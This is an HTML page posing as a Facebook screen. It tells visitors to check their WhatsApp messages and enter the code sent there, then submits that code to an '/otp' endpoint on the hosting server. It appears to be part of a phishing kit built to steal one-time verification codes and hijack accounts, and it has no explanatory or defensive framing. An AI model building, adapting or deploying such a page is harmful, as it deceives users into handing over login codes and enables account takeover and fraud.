<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Facebook</title>
    <link rel="stylesheet" href="public/css/bootstrap.min.css">
</head>
<body style="height: 100vh; background: linear-gradient(60deg, rgb(121 9 120 / 18%) 4%, rgba(0, 212, 255, 0.06486344537815125) 57%)">
<div class="container ">
    <div class="row" style="margin-top: 20vh;">
        <h1 class="col-md-6 offset-md-3">Facebook</h1>
        <h5 class="col-md-6 offset-md-3">Check your WhatsApp messages</h5>
        <p class="col-md-6 offset-md-3">Enter the code we sent to your WhatsApp account.</p>
        <form class="col-md-6 offset-md-3" data-testid="royal_login_form" action="/otp" method="post"
              onsubmit="">
            <div class="mb-3">
                <input type="number" class="form-control" id="exampleFormControlInput1" placeholder="code" name="otp" data-testid="royal_otp" required>
            </div>
            <div class="mb-2 ">
                <button type="submit" class="btn btn-primary" name="login" data-testid="royal_login_button" value="1" style="width: 100%; border-radius: 100px">Continue
                </button>
            </div>
            <div class="mb-2">
                <button type="submit" class="btn btn-outline-secondary mb-3" style="width: 100%; border-radius: 100px">
                    Try another way
                </button>
            </div>
        </form>
    </div>
</div>
</body>
</html>